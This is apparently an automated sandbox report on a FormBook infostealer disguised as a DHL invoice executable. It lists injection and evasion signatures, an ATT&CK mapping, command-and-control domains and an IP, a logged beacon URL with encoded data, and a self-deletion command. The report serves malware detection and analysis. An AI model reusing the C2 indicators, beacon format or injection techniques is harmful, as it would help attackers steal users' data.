          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]11_2_0493D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499FE87 mov eax, dword ptr fs:[00000030h]11_2_0499FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]11_2_0491AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]11_2_0491AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FAB0 mov eax, dword ptr fs:[00000030h]11_2_0493FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]11_2_049052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]11_2_049052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]11_2_049052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]11_2_049052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]11_2_049052A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]11_2_049D0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]11_2_049D0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]11_2_049D0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049846A7 mov eax, dword ptr fs:[00000030h]11_2_049846A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8ED6 mov eax, dword ptr fs:[00000030h]11_2_049D8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04948EC7 mov eax, dword ptr fs:[00000030h]11_2_04948EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932ACB mov eax, dword ptr fs:[00000030h]11_2_04932ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFEC0 mov eax, dword ptr fs:[00000030h]11_2_049BFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049336CC mov eax, dword ptr fs:[00000030h]11_2_049336CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049316E0 mov ecx, dword ptr fs:[00000030h]11_2_049316E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049176E2 mov eax, dword ptr fs:[00000030h]11_2_049176E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932AE4 mov eax, dword ptr fs:[00000030h]11_2_04932AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]11_2_04905210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov ecx, dword ptr fs:[00000030h]11_2_04905210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]11_2_04905210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]11_2_04905210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]11_2_0490AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]11_2_0490AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04923A1C mov eax, dword ptr fs:[00000030h]11_2_04923A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]11_2_0493A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]11_2_0493A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]11_2_0490C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]11_2_0490C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]11_2_0490C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04938E00 mov eax, dword ptr fs:[00000030h]11_2_04938E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1608 mov eax, dword ptr fs:[00000030h]11_2_049C1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918A0A mov eax, dword ptr fs:[00000030h]11_2_04918A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFE3F mov eax, dword ptr fs:[00000030h]11_2_049BFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490E620 mov eax, dword ptr fs:[00000030h]11_2_0490E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]11_2_04944A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]11_2_04944A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CEA55 mov eax, dword ptr fs:[00000030h]11_2_049CEA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04994257 mov eax, dword ptr fs:[00000030h]11_2_04994257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]11_2_049CAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]11_2_049CAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494927A mov eax, dword ptr fs:[00000030h]11_2_0494927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]11_2_049BB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]11_2_049BB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491766D mov eax, dword ptr fs:[00000030h]11_2_0491766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8A62 mov eax, dword ptr fs:[00000030h]11_2_049D8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493B390 mov eax, dword ptr fs:[00000030h]11_2_0493B390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932397 mov eax, dword ptr fs:[00000030h]11_2_04932397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918794 mov eax, dword ptr fs:[00000030h]11_2_04918794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exeDomain query: www.federaldados.design
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: B30000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory written: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.403617766.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.398386364.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364857450.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396982165.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425085384.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383606390.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 532858 Sample: invoice dhl.delivery docume... Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 9 other signatures 2->42 10 invoice dhl.delivery document and original invoice sign.exe 3 2->10         started        process3 file4 28 invoice dhl.delive...nvoice sign.exe.log, ASCII 10->28 dropped 54 Injects a PE file into a foreign processes 10->54 14 invoice dhl.delivery document and original invoice sign.exe 10->14         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.mimamincloor.com 17->30 32 www.federaldados.design 17->32 34 pixie.porkbun.com 44.227.76.166, 49792, 80 AMAZON-02US United States 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 msdt.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          invoice dhl.delivery document and original invoice sign.exe29%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.cuteprofessionalscrubs.com/9gr5/0%Avira URL Cloudsafe
          http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ==0%Avira URL Cloudsafe
          http://federaldados.design0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pixie.porkbun.com
          		44.227.76.166
          		truefalse
            		high
            www.mimamincloor.com
            		unknown
            		unknowntrue
              		unknown
              www.federaldados.design
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.cuteprofessionalscrubs.com/9gr5/true
                • Avira URL Cloud: safe
                		low
                http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ==true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpfalse
                  		high
                  http://federaldados.designmsdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  44.227.76.166
                  		pixie.porkbun.comUnited States
                  		16509AMAZON-02USfalse

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532858
                  Start date:02.12.2021
                  Start time:18:56:21
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 8s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:invoice dhl.delivery document and original invoice sign.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:24
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@7/1@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 10.1% (good quality ratio 9%)
                  • Quality average: 69.7%
                  • Quality standard deviation: 32.8%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 88
                  • Number of non-executed functions: 158
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
